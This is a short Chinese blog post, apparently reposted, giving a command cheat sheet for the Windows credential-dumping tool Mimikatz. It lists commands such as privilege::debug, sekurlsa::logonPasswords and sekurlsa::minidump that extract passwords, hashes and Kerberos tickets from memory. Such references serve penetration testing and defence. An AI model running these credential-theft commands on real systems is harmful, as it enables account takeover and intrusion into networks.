Mimikatz命令简单使用

Posted threesoil

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Mimikatz命令简单使用相关的知识,希望对你有一定的参考价值。

简介

Mimikatz是法国人Gentil Kiwi写的一款windows平台下的轻量级调试器,于2014年4月发起。它的功能非常强大,支持从windows进程lsass.exe 里猎取windows处于active状态账号明文密码、哈希、PIN码和Kerberos凭证,以及pass-the-hash、pass-the-ticket、build Golden tickets等数种黑客技术,还可以本地提权等操作,在内网中杀伤力很大。

命令:       

  • cls-----------------------------清屏
  • exit----------------------------退出
  • version------------查看mimikatz的版本
  • system::user-----查看当前登录的系统用户
  • system::computer-------查看计算机名称
  • process::list------------------列出进程
  • process::suspend 进程名称 -----暂停进程
  • process::stop 进程名称---------结束进程
  • process::modules --列出系统的核心模块及所在位置
  • service::list---------------列出系统的服务
  • service::remove-----------移除系统的服务
  • service::start stop 服务名称--启动或停止服务
  • privilege::list---------------列出权限列表
  • privilege::enable--------激活一个或多个权限
  • privilege::debug-----------------提升权限
  • nogpo::cmd------------打开系统的cmd.exe
  • nogpo::regedit -----------打开系统的注册表
  • nogpo::taskmgr-------------打开任务管理器
  • ts::sessions-----------------显示当前的会话
  • ts::processes------显示进程和对应的pid情况等
  • sekurlsa::wdigest-----获取本地用户信息及密码
  • sekurlsa::tspkg------获取tspkg用户信息及密码
  • sekurlsa::logonPasswords--获登陆用户信息及密码
  • sekurlsa::minidump 1.dmp --对内存dump文件进行破解
  • sekurlsa::logonPasswords full--破解内存中所有保存的密码

 

以上是关于Mimikatz命令简单使用的主要内容,如果未能解决你的问题,请参考以下文章

神器mimikatz使用命令方法总结

安全-内网渗透中mimikatz使用方法

详解Windows渗透测试工具Mimikatz的内核驱动

源码阅读Mimikatz一键获取远程终端凭据与获取明文密码

mimikatz的使用

mimikatz+procdump 提取 Windows 明文密码